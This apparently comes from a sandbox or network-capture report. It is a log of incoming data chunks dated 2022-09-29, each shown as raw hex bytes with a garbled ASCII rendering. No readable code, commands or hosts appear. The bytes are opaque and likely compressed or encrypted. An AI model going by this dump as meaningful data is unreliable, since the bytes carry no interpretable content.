                                                                                                        2022-09-29 12:46:11 UTC9687INData Raw: ab 17 0e e6 c8 5b cb 31 0a 45 d9 4a 0a c4 83 75 cc a9 18 a7 40 ea b7 a4 d2 74 26 d3 2b 1c 6f 4f a0 b9 42 9d 20 41 5c 90 0e 71 73 d2 5c e6 6d db ac 4e bd e8 5c 44 ce 6c 69 8f 0a 3e c6 39 20 df cc a3 69 36 23 ff 5b df f6 c2 dc c4 48 f5 d8 15 b5 b5 12 ae 71 3c 3d 27 e3 ef e6 f8 dc 33 b1 04 a8 e2 c9 d6 10 02 10 6f 56 b9 21 70 58 e3 33 0b 3f fc 79 c5 97 c8 88 b9 31 35 39 b0 a7 e6 09 78 c1 da 3e ad 71 dc 0b bf 6f a7 d3 a6 2b 84 a6 7f fd 4c c4 f5 d6 84 36 22 eb 3c 2c a8 54 8d f9 41 d2 56 d4 f2 03 52 a5 87 7f a5 ed a3 cd ef b8 8a b0 0b ca 1d fe 27 74 0c 4e 32 7a 0b c6 2a 4c 19 5b 28 d3 60 e0 bb d8 e6 b7 94 84 2a fa b8 fe c2 24 61 73 97 0f 42 52 bc 24 c1 9e a2 e5 8d f6 55 96 4c 13 2b f5 09 3c da f6 b4 44 49 78 78 5c 22 c8 59 27 30 78 39 6f f2 04 12 ee e7 65 ab e2
                                                                                                        Data Ascii: [1EJu@t&+oOB A\qs\mN\Dli>9 i6#[Hq<='3oV!pX3?y159x>qo+L6"<,TAVR'tN2z*L[(`*$asBR$UL+<DIxx\"Y'0x9oe
                                                                                                        2022-09-29 12:46:11 UTC9688INData Raw: 14 58 9b 98 fa 4d c0 77 31 1b 88 fb 5c 32 b8 22 ff 90 76 c7 38 66 10 fe ce f7 1f 2c d9 f6 34 87 bb 52 fa f2 bc 9b 5d 17 46 84 58 8f e4 62 44 94 f4 62 55 f2 3f c3 e3 ab 5d ee 12 57 7d c4 60 cc 2f 04 5f 4d 81 ec 05 d7 62 15 66 68 5d 02 7c a8 2d c4 42 01 4b ed c5 13 6e 6c c3 d3 b2 b4 3c 81 57 b2 ad 21 69 a6 6a 1c e4 40 71 80 d1 46 7a 76 24 b3 b4 3c e1 44 57 40 9c 3a 89 ac 29 80 a3 c1 dc 48 9c 44 da e1 cf dc a7 2e 9c dd 54 ee b0 0d 99 bc 31 7f 66 1a 33 1b f2 03 83 82 6b 0e cf 22 99 d7 4a b4 48 2d 85 51 ac 95 d9 7b d6 37 5a f5 df 47 d2 5c 22 fd 86 73 02 0a a0 46 f7 c6 fb 97 1a 71 68 16 88 27 b3 f4 8d 14 4d e4 1d 94 84 a1 03 de 16 e4 3f 5a f7 a4 97 2e 50 e9 5c 19 7b 07 ac 2e 50 5f f1 a7 c1 13 c3 d7 8e b2 c6 4a cf 72 c4 08 d6 e7 2d e0 c6 c9 47 85 29 bc 78 99 46
                                                                                                        Data Ascii: XMw1\2"v8f,4R]FXbDbU?]W}`/_Mbfh]|-BKnl<W!ij@qFzv$<DW@:)HD.T1f3k"JH-Q{7ZG\"sFqh'M?Z.P\{.P_Jr-G)xF
                                                                                                        2022-09-29 12:46:11 UTC9690INData Raw: 50 77 6c e2 c9 08 2f 4d a0 aa 5b 75 b5 16 d3 ae 83 5d 3a f4 68 f4 ee 37 96 d4 08 10 15 57 ab 80 84 f2 f7 be 30 29 ba eb e2 35 bf e2 14 a4 4c 2b 71 97 8d 12 18 27 0b 1f 12 8b f9 87 26 d7 34 d3 98 a8 41 d5 61 df 1c a5 83 48 c3 0c 55 d5 88 c2 77 e8 db fe 25 69 d2 5c f5 2d 48 a2 0b ef 83 9a fe 0d 3d 1a a1 c9 b8 b6 72 71 7f 09 27 69 5c af 31 00 83 eb ad bc bc 88 31 52 f2 d4 a0 35 5d 59 53 ed b3 a0 f9 9b 92 0b f0 e0 e8 3c 7c 74 f4 b9 36 bd 39 ca ae 78 a4 fb 7f f0 88 14 67 b1 47 25 97 cf 33 19 08 7a 4d 73 7f d8 9c a6 e9 18 a0 25 af 1e 43 b3 4f 76 cf ce da 0b b4 32 ed b0 c0 9c 87 83 e4 6d 10 0a 38 dc 4d c4 42 f9 2e 92 25 c7 43 bb 7c 5d 6f 82 f4 9d 47 04 a2 b8 2d 19 14 da 6d 55 6a ea 12 a4 10 02 2b e9 73 40 f5 ba d9 62 79 fe 49 d6 96 4a 46 04 6c 2f 06 19 84 ae 20
                                                                                                        Data Ascii: Pwl/M[u]:h7W0)5L+q'&4AaHUw%i\-H=rq'i\11R5]YS<|t69xgG%3zMs%COv2m8MB.%C|]oG-mUj+s@byIJFl/
                                                                                                        2022-09-29 12:46:11 UTC9691INData Raw: e6 80 9f 29 7b 8d 25 22 f4 24 50 b6 de 37 65 cf f0 86 79 3b 2d 1d bc 2e 36 be 98 1d be 38 55 6d 72 c6 c5 24 ef fe b2 e6 4b b3 01 a4 69 88 bf 7f c4 db 7f 2f e3 41 73 8b 6e 33 92 99 3f 48 fe fc 52 f3 96 fa e5 8c 14 6f f6 c2 bd c7 7a 81 d0 25 a7 b6 d6 23 47 6f 4f 0a 73 56 77 06 72 1d 74 f6 e3 c6 c9 46 1f 9a a0 d2 a0 99 78 a7 3a 64 f8 ac fd 9f b9 f6 bb bf ef 4a 6d 27 3a 46 91 ed 65 50 a1 ae 76 58 32 14 96 a4 76 c0 36 39 de ea fa 3d 5e eb 0e e8 02 c3 5c 57 b2 91 34 74 dc 84 04 82 df 1e 36 06 ff ff 6e 3f a8 38 ec 23 be 00 92 d0 de f8 5c 08 ae 5b e4 69 dd c2 cf 9d e0 0b 16 4c 4c 92 ad 2a e5 f2 02 4d bd 42 05 36 8e 6d 5f 2c 8f a1 5b 50 34 bf 39 95 5b 50 bd d4 89 98 9c c7 6a 72 df da 56 7a 13 80 a7 4b 2a 4d c7 7b 6e d1 b5 da 2d f9 f6 5c 1f f4 c3 26 05 14 ad d9 70
                                                                                                        Data Ascii: ){%"$P7ey;-.68Umr$Ki/Asn3?HRoz%#GoOsVwrtFx:dJm':FePvX2v69=^\W4t6n?8#\[iLL*MB6m_,[P49[PjrVzK*M{n-\&p
                                                                                                        2022-09-29 12:46:11 UTC9692INData Raw: 72 27 a8 80 09 bf b5 57 dd 6a cf b4 13 ad b8 7d ec 4c 09 dd 62 29 5b 56 5a 08 75 da 61 08 15 d4 15 9b 31 92 1c 47 01 03 d0 ba 8b fb 0e 75 8b 3f e0 00 4f 8b 30 d9 2d 0f be e3 29 6f 23 bf 08 22 f3 c1 54 ae 2b f6 52 95 01 d0 be e3 58 d5 ad 12 a0 74 8c 09 6b 30 04 b2 22 5f f6 b5 ac 38 3d 05 63 d7 46 98 9f 2e 68 ee 0b 1b 04 1d 76 37 a1 35 24 9a c8 7a ff a1 08 0c 47 db 08 5d d2 d4 70 e1 97 29 69 90 36 c0 a8 be ec 8c 05 91 60 c0 78 14 9a d1 65 e3 1f 1f 18 16 7d ee 47 bb 14 cf 73 ab 11 64 27 17 21 60 f1 df bc df 35 49 0d a7 39 74 bc 4f 21 b8 16 b0 f2 b1 fa 5e 90 38 56 28 12 b1 ec ad 04 59 8c d0 72 33 21 d8 6b ec d3 6e ff 6c a7 3f bc 0e 21 d0 5e b0 3a ef 3e 03 43 e8 d8 c8 3f 37 3b 4a 86 50 aa 71 bc 87 4e 47 26 46 12 fb d1 50 63 28 74 85 55 8d 43 bb 46 01 77 23 67
                                                                                                        Data Ascii: r'Wj}Lb)[VZua1Gu?O0-)o#"T+RXtk0"_8=cF.hv75$zG]p)i6`xe}Gsd'!`5I9tO!^8V(Yr3!knl?!^:>C?7;JPqNG&FPc(tUCFw#g
                                                                                                        2022-09-29 12:46:11 UTC9694INData Raw: 74 e7 23 8e 88 b3 29 9d 28 d3 c1 b7 d7 e2 47 d9 0c 02 4a 3b 7b c3 d3 5a 63 3b 8d 53 3e 4f c7 e1 a9 15 da 66 6b 2d b2 45 c2 73 5d a8 39 00 12 44 93 27 96 b6 05 84 d0 b5 52 c1 3e cd 21 80 04 40 0c 2c 4f fa 13 b7 58 f6 ce 0e f5 19 35 0e 83 a3 a5 09 31 6d 08 a8 7b 39 47 78 48 a8 1a 34 1d dc c9 3f 90 df b6 5c 94 3f 4a 68 5a 6f dc a0 9a 5a 1e b5 73 e6 00 ca 44 6a 98 6d a8 a9 f2 23 fe b6 14 9e 0f 36 3e e5 b4 39 fb b1 1b 5c 03 35 08 b2 e3 3d e0 af 31 35 a4 eb 47 96 aa 94 f2 5e b6 88 4b 44 06 1d 38 e5 4a 80 aa 3b 8d 74 f0 a1 08 2c ae 68 70 04 74 d0 e7 9d f0 00 31 f6 84 1f 11 80 d1 ef c6 af 87 9e ba 12 96 17 51 44 e1 93 15 12 3b 5a 9d c1 53 1f f5 53 5f 85 a4 8c 00 25 3e bc d1 16 c2 79 e5 cd 10 6f f7 44 8a 2d e0 5e 93 28 32 7d b8 16 16 ad dc e9 54 0b 0c 9b a5 20 16
                                                                                                        Data Ascii: t#)(GJ;{Zc;S>Ofk-Es]9D'R>!@,OX51m{9GxH4?\?JhZoZsDjm#6>9\5=15G^KD8J;t,hpt1QD;ZSS_%>yoD-^(2}T
                                                                                                        2022-09-29 12:46:11 UTC9695INData Raw: 1f ff 29 bc 49 cd a0 82 e3 59 81 a0 4e fd bf 0b e6 fa f2 ee c5 c2 46 eb a0 53 fa b0 fe 86 93 f1 4c ed 6c 67 42 f2 5a e0 a1 9f d2 25 3f 27 1b bc 00 57 ca c0 66 c7 48 0c 31 30 6b f6 09 56 c9 3c bc 41 a4 06 41 6e f2 6b 06 3a 73 dc b9 21 e2 d2 7a 9c 20 17 3d 5c 33 36 80 20 e0 d2 af 6b 7d fe d5 e7 1a 45 a4 3d 3d c7 12 d7 6e ed ee c5 c5 19 71 57 2d ab 1d d6 6d 79 54 be ca 81 7c b6 c1 94 ea 2a 12 98 60 af 89 cd 3c 22 cf e5 07 02 63 46 8a f8 d7 d7 1d 4e b1 aa 1e b8 37 c7 37 20 4c 70 29 13 9c 8a 1c b4 10 88 df 25 51 09 46 49 12 20 e5 c0 56 75 81 1f 59 1f e4 b5 cc d9 5d 17 a3 1a 9c 20 3c b1 11 af 58 76 c5 39 e7 eb 30 80 ed 36 d1 9c f0 0d dc f8 b3 2e 43 6f 19 06 c3 fb b4 8f 59 e1 6a df 82 44 6b a8 d1 32 1b 3e 75 d3 37 0b a2 21 38 5d 7f e4 cb 07 cd 55 ec b7 55 1b ef
                                                                                                        Data Ascii: )IYNFSLlgBZ%?'WfH10kV<AAnk:s!z =\36 k}E==nqW-myT|*`<"cFN77 Lp)%QFI VuY] <Xv906.CoYjDk2>u7!8]UU
                                                                                                        2022-09-29 12:46:11 UTC9696INData Raw: 84 11 33 65 90 c7 3e 15 20 70 29 bb 5f de d4 91 ba 1d ad 66 a5 56 36 72 13 b2 30 42 f8 bd 5c 22 36 a2 03 7c 53 4f 30 a4 a2 d5 7d 63 54 e2 e5 31 f2 b6 28 7b 9a 6f d1 45 d7 bb b5 7b 17 0a 85 c0 71 e6 6a 28 f4 3a 72 fb b8 fe 0a 73 24 1b e8 39 56 30 1b 54 64 a7 24 1e 2b 6e 3b 34 58 b3 da 94 1a 34 f8 2f 1d c9 8a 23 48 df 62 59 a8 15 04 01 9f 67 51 88 d9 63 94 f6 8d de 0a 69 48 73 05 bc de 50 5d ab 34 62 ac c3 3a 2d 40 12 5e 43 15 5d 0b fd 98 85 e7 16 66 1f 4a 3e da a5 45 74 10 5d 49 10 4c ab 8b 9d 5b 68 5f 8e 84 cd ba 3d a0 47 7b 6a 1b cf 18 ed a5 2e fd eb 95 f1 85 36 98 e0 a1 a5 19 e7 84 74 fd 78 7c 22 e0 08 4e e3 0c 32 02 98 32 bd f5 e4 23 66 c9 59 87 e5 b9 ec 5a de 04 49 d6 61 ad c0 9b 69 72 8a a4 f4 ba d7 a7 9a 1d ea 79 c5 79 9d 32 ca fe 7e 51 3e 4a 8f fe
                                                                                                        Data Ascii: 3e> p)_fV6r0B\"6|SO0}cT1({oE{qj(:rs$9V0Td$+n;4X4/#HbYgQciHsP]4b:-@^C]fJ>Et]IL[h_=G{j.6tx|"N22#fYZIairyy2~Q>J
                                                                                                        2022-09-29 12:46:11 UTC9698INData Raw: 0a 75 af d5 23 38 e8 aa d7 84 10 18 c9 a5 a3 31 c2 b9 93 37 3c 16 15 ed 69 1d 06 51 32 14 37 a9 0b fb 00 ab f9 01 98 7e 3e 09 b7 09 1e a7 b4 37 5a 5a 6c 15 e7 23 93 7e da 40 f5 c0 e6 50 b0 fd a8 0b f9 4a 29 36 a5 e1 c8 d1 36 94 9b 88 3b 17 8e 4a 6f 0a a9 1a 2e 77 59 cd f0 00 e6 2a 1d 16 06 9a 96 1e 0e c0 c7 2c 7a f2 68 a1 bf e1 ed f9 0d b5 6a 3b 4c c9 25 12 ed ad 6c 80 5a 4a 12 98 94 bc 41 ef 12 a6 d1 88 17 7c 40 80 16 fb 2b d8 66 2e ca 87 ac df 0d 0f 66 dd a1 19 dc 74 bb c9 a5 1d 66 60 a3 91 f2 4f 3b 2a 0c e9 27 d5 73 9f 8a 6b ea 7c f8 78 dc 2f 69 82 87 d2 1e 17 c1 00 ce 6a 65 25 0f 4a af 20 c4 36 f0 46 bb 79 ee c5 35 19 03 ca 63 c1 d0 1d 43 eb e2 22 d8 bf 4e 20 ec c2 04 d7 fb 0e 34 c8 f2 e3 69 0c 1f ad 67 85 60 a6 d3 b0 e0 00 78 d5 02 70 2e 98 fb b3 9e
                                                                                                        Data Ascii: u#817<iQ27~>7ZZl#~@PJ)66;Jo.wY*,zhj;L%lZJA|@+f.ftf`O;*'sk|x/ije%J 6Fy5cC"N 4ig`xp.
                                                                                                        2022-09-29 12:46:11 UTC9699INData Raw: 8f a4 87 bf 85 d4 d7 5d 75 1a 94 0b 1f f4 6c 81 8d 3d 6c d4 58 70 ed 5b b0 e3 7c 90 f2 f9 dc 8f 1c 55 2c c5 ce 9e b0 b3 d2 eb a4 ef ed dd 2a c0 1e 48 7b e8 9f b4 45 8b 30 7a 6a 0b ba 00 8c 40 b6 42 50 c3 92 27 78 b3 b4 af 08 36 0c b9 ea 13 f4 11 fc 1c 99 91 7b 7a bd 53 ed b5 47 07 b0 a4 c6 a7 ea db 87 e4 18 46 18 67 ba 1e 1c 23 63 88 a4 42 70 48 2b 9a 09 b6 6e af ab 0f 4c 82 70 9c 95 b7 fc 5a 14 99 66 45 a4 29 f5 65 83 ec 07 bc 36 83 d0 71 d8 90 0e 3e f2 25 3b 1e de e3 f9 17 37 c2 50 01 af 7c 19 ba cb a7 57 62 f8 f0 42 e6 e5 49 3e 92 0a f2 ef 59 bc 9c 95 b8 3a 88 25 34 46 00 53 6f f4 78 bf f9 14 c9 7f e8 1d a8 8a 30 3c 01 30 0c 61 fe d0 e2 92 40 ca 52 e0 8b 87 c6 2c fd f8 7e 19 f6 0b df ba a5 d0 80 84 50 24 03 9b da 7c 0f 24 06 f8 04 dc 23 f2 2e 39 5f e1
                                                                                                        Data Ascii: ]ul=lXp[|U,*H{E0zj@BP'x6{zSGFg#cBpH+nLpZfE)e6q>%;7P|WbBI>Y:%4FSox0<0a@R,~P$|$#.9_
                                                                                                        2022-09-29 12:46:11 UTC9700INData Raw: 50 b9 8e 21 3f ba 22 7a 56 6d e0 14 46 21 eb 84 8e 43 15 f1 f5 a0 7c 53 a1 8d 0d 20 dd bb 95 3a e1 b9 59 7c 87 27 52 7b e8 2c 04 08 56 c7 41 01 44 18 2a f1 2f 24 d3 e7 58 35 59 f4 a8 6a 09 e9 4a a6 af f9 4e f5 b4 e4 e3 93 63 d9 38 cc 2c 36 b1 6c 7a c3 f4 79 d5 30 9a 76 32 d2 7a 15 27 39 52 fe 17 c3 85 33 d5 6e a1 36 50 8e 2b 76 8f 83 0e 0d 99 df 9a 4d 20 46 79 03 7a 2f 05 67 d8 15 0a 12 4f 23 ad f3 e5 b3 1f ac 2b f6 77 66 34 9b da b3 1c b7 d8 db 58 ec d2 3f 30 5a 37 e7 ac 4a cb 16 3e 8d ff 07 e5 d6 69 f7 94 cc 1a e1 cd 66 3b d4 82 18 78 78 1f d5 76 b3 36 cf 5e 80 9f a0 fd ae 63 2c f4 06 b7 74 39 ca c2 0f 08 06 97 66 d4 ba d6 19 a0 56 1f 41 29 3f 91 4b b0 d4 4e ad b0 22 dc a3 17 e9 f3 8f fe 49 9b 96 d8 ac 7d 80 8b d5 9a 17 e3 2b ca df 8d d2 46 44 db 25 69
                                                                                                        Data Ascii: P!?"zVmF!C|S :Y|'R{,VAD*/$X5YjJNc8,6lzy0v2z'9R3n6P+vM Fyz/gO#+wf4X?0Z7J>if;xxv6^c,t9fVA)?KN"I}+FD%i
                                                                                                        2022-09-29 12:46:11 UTC9701INData Raw: 67 a8 c6 ac 31 91 5a 31 e8 c7 bc 4e d5 4f 2d b5 2e 2d 33 00 2f 11 96 dd 06 a5 ad 04 01 71 b2 2e 47 9f 82 1a 53 d6 c9 b5 54 ae 46 63 11 d5 a9 e5 e0 79 3d 69 4a a8 4d ee 10 bf 05 8d cf 7b f1 09 08 4e bb 45 54 c4 b2 7d fb 65 db 5b 6a 63 a9 36 32 1a c5 e4 6a 50 ed 21 a8 7b c4 4e fb 39 04 a1 d9 04 0c f4 cf b5 18 88 83 06 59 dd 2b 43 41 8e f8 e6 93 73 d4 b2 40 f7 16 8b 31 e2 f5 97 a0 cb 52 96 9f 2c e6 cc 84 2f 8c b8 d2 e7 51 c9 29 bc 05 8f 34 d8 d9 3c b6 0b 93 40 42 58 79 55 7d 42 d1 ae d4 e9 f0 e1 8a 1f 6d a5 ad f1 77 ce e5 8d 76 af a2 5f af 90 e7 a4 86 7b 37 7f a3 ec 79 2c 3f 19 56 84 16 5b c9 9e 3b ae 9f 77 44 d7 6d a3 d1 ee fa 34 66 8c 41 f9 4e 7a f1 d3 14 3d fa 1d c6 44 86 04 59 f8 0c 64 85 47 5f 23 38 39 74 8e 0e dc 8f 1a 30 d7 b5 e1 f2 fa 4e b1 a4 2a 4a
                                                                                                        Data Ascii: g1Z1NO-.-3/q.GSTFcy=iJM{NET}e[jc62jP!{N9Y+CAs@1R,/Q)4<@BXyU}Bmwv_{7y,?V[;wDm4fANz=DYdG_#89t0N*J
                                                                                                        2022-09-29 12:46:11 UTC9717INData Raw: f7 1b c9 fa 5d 62 9b 58 9f 90 d9 f1 e4 f9 07 9e 81 b8 ea 58 48 75 e0 57 13 dc 1b 3e 35 a8 3a 09 5d d3 ed 6d 3a b5 23 ef 68 72 ec e7 1a 8c 82 9a 61 1c 19 67 80 b0 8e b2 6d 4b 7c 1e 6c 02 d8 2a 50 6b 63 ba 9f cd 75 a4 b5 d7 a0 a0 58 d8 ce 10 2a 88 a1 79 09 a4 b8 e9 9e 36 7c b1 cd bf 25 75 ba 55 9a f5 36 4f cb 4b 46 ab 6f 3c 19 72 11 cc 3d 6e 27 11 e9 78 1a 55 18 45 4b 7c 6e 77 2f ee 12 9e 61 87 95 c2 b0 0c 32 8b 9a 65 5b d5 b8 be db 8c 27 b0 15 ef 62 47 04 15 a3 d1 6b f5 44 86 56 ca 1b 42 c7 3f 9e 9f 61 55 7f 22 54 b8 4a f1 23 69 93 69 90 c7 fc aa bf 44 74 0c fd 68 8d e5 0a c6 fb 41 20 f0 bb 73 62 ca 30 be 7f 5a be ae ba c4 8a 41 5d 83 07 df b5 33 4a 98 d7 d3 5e b4 f6 1b b1 68 65 8d a0 25 07 d3 44 b9 c2 08 d9 d3 2b 53 94 4f b8 ea 85 a9 29 ad 29 87 1b 33 de
                                                                                                        Data Ascii: ]bXXHuW>5:]m:#hragmK|l*PkcuX*y6|%uU6OKFo<r=n'xUEK|nw/a2e['bGkDVB?aU"TJ#iiDthA sb0ZA]3J^he%D+SO))3
                                                                                                        2022-09-29 12:46:11 UTC9733INData Raw: b5 cb 41 6e 1b 97 5c b2 78 5c 93 e4 a4 19 1b 40 33 ad f7 7d 7d 2b a3 7a e9 7c 64 35 1b 43 6a a5 b9 61 2a 45 dd ec f7 15 69 e3 cb 05 32 1e 83 29 17 3c 0f 1c eb 0a 80 7f 3b 38 93 b0 c3 5f 1e 47 85 43 8b 5f ff de 25 58 62 8e 9b 55 42 52 31 8b 54 50 5f e2 38 64 36 83 21 9f 86 93 4c 0f ea 63 7c d3 96 9c fa ac 58 1f a8 d9 12 20 8d 2f 6e d2 f1 38 2e 23 ab f6 63 7c 8a ac b4 f5 ba 02 fb 31 16 45 70 1f 4f 15 a1 28 5c ee e1 6f 2a 2f 4f b0 37 bd c6 00 55 7e 52 ee be 60 ad ee 4f 4c bb b6 e5 f8 c6 f7 62 ea 7e f1 af 35 b2 3b e6 82 9b 78 b8 b5 92 e4 e2 9f b6 0e 96 6c f9 24 20 08 2a ad 0a 44 18 2c e4 15 a9 a2 3f 2e 8c 34 1f d0 58 46 03 c9 66 26 9a d4 32 a6 42 72 f9 5b 32 78 f0 4b e4 80 65 66 88 b1 32 59 47 a9 73 dc 48 56 32 3a d5 b1 61 a8 0b 0a bb 80 ed cb 92 d0 7d 8d e8
                                                                                                        Data Ascii: An\x\@3}}+z|d5Cja*Ei2)<;8_GC_%XbUBR1TP_8d6!Lc|X /n8.#c|1EpO(\o*/O7U~R`OLb~5;xl$ *D,?.4XFf&2Br[2xKef2YGsHV2:a}
                                                                                                        2022-09-29 12:46:11 UTC9749INData Raw: d5 61 90 d0 a8 00 3a 9d ea 44 e1 c5 ea f8 82 58 4d d4 d2 bd f2 b6 7f 2f c8 d1 04 dc c4 52 f0 3d ec 28 21 41 e1 aa d0 1c 1e db eb e9 8c 36 84 bd 92 4b 23 df 1d aa b3 9e b2 4d 84 55 35 7a 4d 08 ac c0 01 01 8a d2 71 1c 08 ef 9e 0a 0b e8 f5 ae 1c 3d 4a 99 e0 4e 4d 63 bd 29 82 eb 5c db e2 a5 bd fb 8e ed e2 5e a3 92 b0 79 57 e6 a9 7c 0c 54 bf ff ff da d2 61 22 ee 0d 0d e5 ad 7b 25 42 35 cc d2 ef 5b d6 67 45 9b c8 8d f9 53 52 77 48 91 06 e1 9e 8b 63 18 99 d4 fb a5 c5 af 1b 3e b5 10 6b 62 09 12 8e fd 06 ac 7b 20 e1 d3 91 28 36 13 d5 44 d3 72 1b f4 d0 a8 c7 56 a5 aa 1d d8 0c 9c 2e b5 57 b3 94 51 78 5c 7b 1a 53 95 22 69 08 59 97 87 85 4b 76 81 69 97 31 6f 8a 07 98 d9 70 4c db a7 a1 7b 81 99 93 c2 84 5a bb c1 2c 86 ca 6d 5a 08 8a 8b 41 b4 d8 54 88 68 d8 ec 6b 64 b9
                                                                                                        Data Ascii: a:DXM/R=(!A6K#MU5zMq=JNMc)\^yW|Ta"{%B5[gESRwHc>kb{ (6DrV.WQx\{S"iYKvi1opL{Z,mZAThkd
                                                                                                        2022-09-29 12:46:11 UTC9765INData Raw: 9d 9f 46 9d f3 b4 47 9a 74 58 b2 d6 86 23 98 48 be 29 86 a8 77 82 20 a9 28 78 8a 22 52 93 99 ba d2 59 b5 6f 73 72 2a 01 dc ca 57 c2 95 67 ec ac c2 36 90 83 02 c7 82 16 e6 98 3a bf c6 61 10 e0 51 7f f3 54 74 10 ea bb 9e 43 7b 73 76 28 8f f8 32 3a 3d 18 aa 0f 0b 48 a2 ee a0 4d b5 96 f2 b1 4b df 37 82 83 1c 1d 9f f7 bb 1f 02 12 f6 9c d2 aa 35 de 18 8b ba 71 e7 dc 91 f0 98 8f f7 0a 7e e6 cf 6b a7 d9 9a cc 00 42 c7 d3 48 3f 1d 05 93 9a 5f 8b 78 0a 78 46 bc 02 21 db e1 41 3b d4 b3 50 7d 62 6a 0e 36 83 a2 cc cc 36 eb 94 85 8e 9b ba 29 f2 0e 97 da 58 e1 92 59 d2 3d 4c bd 9f c9 42 63 25 9f 26 23 cd 29 52 24 3a de a3 bb 95 64 d0 b3 b9 d6 f1 4a 70 cb 5e 75 23 81 29 31 fc 6c 68 1f 8d b9 84 4d 58 52 1a 62 7c c8 88 9b 7b 3d 98 04 e4 6d 52 e5 34 cf be c6 f3 5b d0 1a 84
                                                                                                        Data Ascii: FGtX#H)w (x"RYosr*Wg6:aQTtC{sv(2:=HMK75q~kBH?_xxF!A;P}bj66)XY=LBc%&#)R$:dJp^u#)1lhMXRb|{=mR4[
                                                                                                        2022-09-29 12:46:11 UTC9781INData Raw: b5 a5 38 c2 9b 06 92 b5 47 da b1 0d 94 f8 4b 89 2f 2c eb 3f e6 b3 aa 72 fb 3a 29 9b f3 9f e0 a9 2d 68 4d ab 48 05 ce 9e 64 14 7a 13 c2 c4 3c 75 78 55 ad d4 d7 d3 af 65 8e d4 17 56 62 e5 e3 67 3d e0 d7 00 39 bc f0 ad f7 8b db 4f 7a d0 13 99 26 6a 10 38 ee e4 70 b0 af 9d 9a f5 81 78 51 16 e9 c0 e6 56 01 ea e4 d8 f4 61 d4 04 61 7c c7 73 28 5d 2b 32 5c 9f 6b fc 63 90 ac a4 27 e1 12 63 56 84 cb 6f 0c 81 c1 96 56 b3 84 ef 06 68 12 b3 e0 d9 82 98 d6 3d 17 73 b5 46 3f 07 e2 a1 43 f5 1f 2e 5b 9b 53 58 49 f5 73 c6 ef 21 63 c7 0e 83 8e 6f d9 2e d7 e3 85 ca 40 a8 e8 57 29 6f 47 15 f2 fb 21 0c d2 f0 a0 55 d2 25 eb 28 32 ab ab ac 02 6f d2 b6 7f 0d e0 c0 17 d7 f6 96 02 89 cd 09 03 e1 5a 74 5d 68 94 95 72 d4 6c cf 5f 7a ce 6b a6 65 1d 48 46 f4 c4 82 97 56 9c ee 96 5e f3
                                                                                                        Data Ascii: 8GK/,?r:)-hMHdz<uxUeVbg=9Oz&j8pxQVaa|s(]+2\kc'cVoVh=sF?C.[SXIs!co.@W)oG!U%(2oZt]hrl_zkeHFV^
                                                                                                        2022-09-29 12:46:11 UTC9797INData Raw: 33 32 80 80 e6 6c 46 41 5e 6e 77 69 6b 07 2c 33 b5 bc 9c c4 f4 a5 8d c0 32 6e 66 de 90 6a 8e a5 27 5b c5 0a 54 41 5f 47 7b 44 44 c9 41 d1 95 42 65 cb b1 5a a4 53 fc 49 cd 5c 4f 33 0d 97 44 e9 a4 ac 39 c7 82 e7 4a d0 01 7e 2d c0 cd d2 e2 7a 86 5b c1 36 ca 2e 1c 33 92 81 bf ae 57 81 99 55 2c 6d 1c 40 06 da 3b 21 a1 01 ec 69 2e d0 b0 2a 08 90 d9 b1 b8 78 47 1e f6 52 42 e4 c4 9a 21 57 75 97 db 24 a7 d5 b8 8b 71 49 25 71 41 db 0d 85 0f 54 18 1c fd dc 94 23 b9 00 94 b4 5a f4 77 95 d6 7c 9d c2 c3 cb 2f 68 7b ed f6 fe 3b 30 91 6a 4f 4c 13 66 44 57 32 68 d9 09 89 36 0f 36 3e 2e 84 9d 99 a1 69 2b 6d 07 9f 8d c9 4a 61 0d 6b 6d 72 51 d5 13 7f a9 0a 2f 35 f7 ce 9e 81 d3 db bd 59 15 c8 60 73 3b 0f 00 0d dc a1 5b 68 cd 1b d0 f2 02 43 7d 27 af 09 d0 83 91 2c 05 05 ac 12
                                                                                                        Data Ascii: 32lFA^nwik,32nfj'[TA_G{DDABeZSI\O3D9J~-z[6.3WU,m@;!i.*xGRB!Wu$qI%qAT#Zw|/h{;0jOLfDW2h66>.i+mJakmrQ/5Y`s;[hC}',
                                                                                                        2022-09-29 12:46:11 UTC9813INData Raw: 88 d1 a4 09 31 f9 ec 11 3a 94 ab de 63 b9 89 78 4b 7c 61 45 4f 08 e2 2e c2 70 57 65 1e 9c ec ab 96 64 b4 f0 7b da 5d 15 53 43 34 42 a4 78 21 93 62 c8 0d 2a 1a 8a 5f df 04 fd 65 95 1d d8 9b e4 dc f8 0a 5e 8b 38 d1 8d 77 86 ce 3c fb b6 c1 db a7 62 80 66 ce 31 23 77 01 26 1f 87 13 6c 23 78 a5 55 cf ec a9 21 c7 ed 09 6d 36 95 27 48 0c d2 0a bc 90 58 db b3 43 61 26 93 5c 80 23 76 af 8b 39 0d b4 59 e8 18 35 50 9a a6 34 45 53 63 89 af 23 27 90 c2 d8 be ee d9 32 4e 8d 1a 6c d5 98 af c4 c1 5f 1f e8 74 67 e2 af dc 66 8e e4 6d 96 dd 5d 1f 0f ab 82 0c d9 51 a4 23 73 05 a6 58 18 b7 c2 b9 5f e7 2a 6f cc 35 28 0a 3f 94 a1 cc 53 de b5 24 8d 25 87 a4 16 ab a7 95 b1 d2 32 2c cd 4f d6 92 1c 28 f9 f2 3a 65 ab 5f 4e 0e 31 95 93 91 ab be be ee ab 7c 21 f9 dd d8 32 fd 2d 7b 0f
                                                                                                        Data Ascii: 1:cxK|aEO.pWed{]SC4Bx!b*_e^8w<bf1#w&l#xU!m6'HXCa&\#v9Y5P4ESc#'2Nl_tgfm]Q#sX_*o5(?S$%2,O(:e_N1|!2-{
